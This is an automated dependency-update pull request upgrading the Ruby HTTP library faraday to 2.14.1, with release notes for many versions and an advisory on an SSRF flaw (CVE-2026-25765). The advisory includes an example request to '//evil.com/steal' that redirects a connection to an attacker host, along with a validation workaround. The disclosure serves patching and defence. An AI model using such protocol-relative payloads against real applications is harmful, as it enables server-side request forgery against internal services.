chore(deps): update dependency faraday to v2.14.1 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
faraday (source, changelog)	'2.8.1' → '2.14.1'

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2026-25765

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #​1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

---

Release Notes

lostisland/faraday (faraday)

v2.14.1

Compare Source

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot by @​Copilot in #​1642
• Add RFC document for Options architecture refactoring plan by @​Copilot in #​1644
• Bump actions/checkout from 5 to 6 by @​dependabot[bot] in #​1655
• Explicit top-level namespace reference by @​c960657 in #​1657

New Contributors

• @​Copilot made their first contribution in #​1642

Full Changelog: lostisland/faraday@v2.14.0...v2.14.1

v2.14.0

Compare Source

What's Changed

New features ✨

• Use newer UnprocessableContent naming for 422 by @​tylerhunt in #​1638

Fixes 🐞

• Convert strings to UTF-8 by @​c960657 in #​1624
• Fix Response#to_hash when response not finished yet by @​yykamei in #​1639

Misc/Docs 📄

• Lint: use filter_map by @​olleolleolle in #​1637
• Bump actions/checkout from v4 to v5 by @​dependabot[bot] in #​1636
• Fixes documentation by @​dharamgollapudi in #​1635

New Contributors

• @​c960657 made their first contribution in #​1624
• @​dharamgollapudi made their first contribution in #​1635
• @​tylerhunt made their first contribution in #​1638

Full Changelog: lostisland/faraday@v2.13.4...v2.14.0

v2.13.4

Compare Source

What's Changed

• Improve error handling logic and add missing test coverage by @​iMacTia in #​1633

Full Changelog: lostisland/faraday@v2.13.3...v2.13.4

v2.13.3

Compare Source

What's Changed

• Fix type assumption in Faraday::Error by @​iMacTia in #​1630

Full Changelog: lostisland/faraday@v2.13.2...v2.13.3

v2.13.2

Compare Source

What's Changed

• CI against Ruby 3.4 by @​Earlopain in #​1622
• Only load what is required from cgi by @​Earlopain in #​1623
• Lint rack_builder.rb: avoid naming a method by @​olleolleolle in #​1626
• Add migrating from rest-client docs section. by @​simi in #​1625
• Include HTTP method and URL in Faraday::Error messages for improved exception log transparency by @​nielsbuus in #​1628

New Contributors

• @​simi made their first contribution in #​1625
• @​nielsbuus made their first contribution in #​1628

Full Changelog: lostisland/faraday@v2.13.1...v2.13.2

v2.13.1

Compare Source

What's Changed

• Logger middleware default options by @​yenshirak in #​1618
• Fix Style/RedundantParentheses in options/env.rb by @​iMacTia in #​1620

New Contributors

• @​yenshirak made their first contribution in #​1618

Full Changelog: lostisland/faraday@v2.13.0...v2.13.1

v2.13.0

Compare Source

What's Changed

• feat(ssl options): support SNI hostname by @​bf4 in #​1615

New Contributors

• @​bf4 made their first contribution in #​1615

Full Changelog: lostisland/faraday@v2.12.3...v2.13.0

v2.12.3

Compare Source

What's Changed

• Remove ruby2_keywords by @​tisba in #​1616
• Fix thread safety issue by avoiding mutation of proxy options hash by @​QWYNG in #​1617

New Contributors

• @​QWYNG made their first contribution in #​1617

Full Changelog: lostisland/faraday@v2.12.2...v2.12.3

v2.12.2

Compare Source

What's Changed

• Use generic argument forwarding + remove ruby2_keywords by @​chaymaeBZ in #​1601
• [TEST] fix compatibility with ruby 3.4.0dev by @​mtasaka in #​1604
• Formatting the log using parameter progname for the logger by @​kodram in #​1606

New Contributors

• @​chaymaeBZ made their first contribution in #​1601
• @​mtasaka made their first contribution in #​1604
• @​kodram made their first contribution in #​1606

Full Changelog: lostisland/faraday@v2.12.1...v2.12.2

v2.12.1

Compare Source

What's Changed

• Allow faraday-net_http 3.4.x by @​richardmarbach in #​1599

New Contributors

• @​richardmarbach made their first contribution in #​1599

Full Changelog: lostisland/faraday@v2.12.0...v2.12.1

v2.12.0

Compare Source

What's Changed

New features ✨

• Make RaiseError middleware configurable to not raise error on certain status codes (e.g. 404) by @​clemens in #​1590

Fixes 🐞

• Add json as an explicit dependency by @​deivid-rodriguez in #​1589

Misc/Docs 📄

• docs: fix grammar by @​dijonkitchen in #​1588

New Contributors

• @​dijonkitchen made their first contribution in #​1588
• @​deivid-rodriguez made their first contribution in #​1589
• @​clemens made their first contribution in #​1590

Full Changelog: lostisland/faraday@v2.11.0...v2.12.0

v2.11.0

Compare Source

What's Changed

This release adds support for the ciphers SSL option (currently supported by the net_http adapter in v3.3+), as well as taking advantage of the support of chained certificates introduced in the net_http adapter in v3.2.
Also, it adds a new ParallelManager#execute interface that improves on the existing one and makes it easier for adapters to support parallel requests. This is currently used by the async-http adapter.

New features ✨

• Add support for a new ParallelManager#execute method. by @​iMacTia in #​1584
• Add ciphers attribute to SSLOptions by @​womblep in #​1582

Misc/Docs 📄

• Opt-in for MFA requirement explicitly by @​tagliala in #​1580
• Fix typos by @​tagliala in #​1585

New Contributors

• @​tagliala made their first contribution in #​1580
• @​womblep made their first contribution in #​1582

Full Changelog: lostisland/faraday@v2.10.1...v2.11.0

v2.10.1

Compare Source

What's Changed

• Update JS deps by @​olleolleolle in #​1574
• fix: Avoid lazy-initialized lock by @​olleolleolle in #​1577

Full Changelog: lostisland/faraday@v2.10.0...v2.10.1

v2.10.0

Compare Source

What's Changed

This release introduces support for middleware-level default_options 🎉
You can read more about it in the docs.

New features ✨

• Introduce Middleware DEFAULT_OPTIONS with Application and Instance Configurability by @​ryan-mcneil in #​1572

Bug Fixes 🐞

• Add logger as dependency by @​wynksaiddestroy in #​1573

Misc/Docs 📄

• Configure "npm" package-ecosystem for Dependabot by @​yykamei in #​1571

New Contributors

• @​wynksaiddestroy made their first contribution in #​1573
• @​ryan-mcneil made their first contribution in #​1572

Full Changelog: lostisland/faraday@v2.9.2...v2.10.0

v2.9.2

Compare Source

What's Changed

Bug Fixes 🐞

• Merge relative url without escaping (#​1567) by @​ykrods in #​1569

New Contributors

• @​ykrods made their first contribution in #​1569

Full Changelog: lostisland/faraday@v2.9.1...v2.9.2

v2.9.1

Compare Source

What's Changed

New features ✨

• Make dig method case-insensitive in Faraday::Utils::Headers by @​vitali-semenyuk in #​1557
• Add TooManyRequestsError (429) to error docs by @​tijmenb in #​1565

Bug Fixes 🐞

• Fix compatibility with Ruby 3.4.0-preview1 by @​m-nakamura145 in #​1560
• Support default json decoder even when nil responds to :load by @​gtmax in #​1563

Misc/Docs 📄

• add bundler config to dependabot by @​geemus in #​1548
• Add RuboCop disables for Style/ArgumentsForwarding by @​olleolleolle in #​1550
• docs: update body param type for run_request by @​G-Rath in #​1545
• Remove unnecessary rubocop disable comments. by @​iMacTia in #​1551
• Update rack requirement from ~> 2.2 to ~> 3.0 by @​dependabot in #​1549
• Use Rubygems Trusted Publishers to publish. by @​iMacTia in #​1552
• Lint fix: get to green by @​olleolleolle in #​1558
• Fix Rubocop errors by @​iMacTia in #​1561

New Contributors

• @​G-Rath made their first contribution in #​1545
• @​vitali-semenyuk made their first contribution in #​1557
• @​m-nakamura145 made their first contribution in #​1560
• @​gtmax made their first contribution in #​1563

Full Changelog: lostisland/faraday@v2.9.0...v2.9.1

v2.9.0

Compare Source

What's Changed

NOTE: This release removes support for Ruby 2.6 and 2.7, making Ruby 3.0 the minimum version.

• Remove runtime dependency on base64 by @​Earlopain in #​1541
• Make Ruby 3.0 the min version by @​iMacTia in #​1544
• Bump faraday-net_http version to allow 3.1 by @​iMacTia in #​1546

New Contributors

• @​Earlopain made their first contribution in #​1541

Full Changelog: lostisland/faraday@v2.8.1...v2.9.0

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud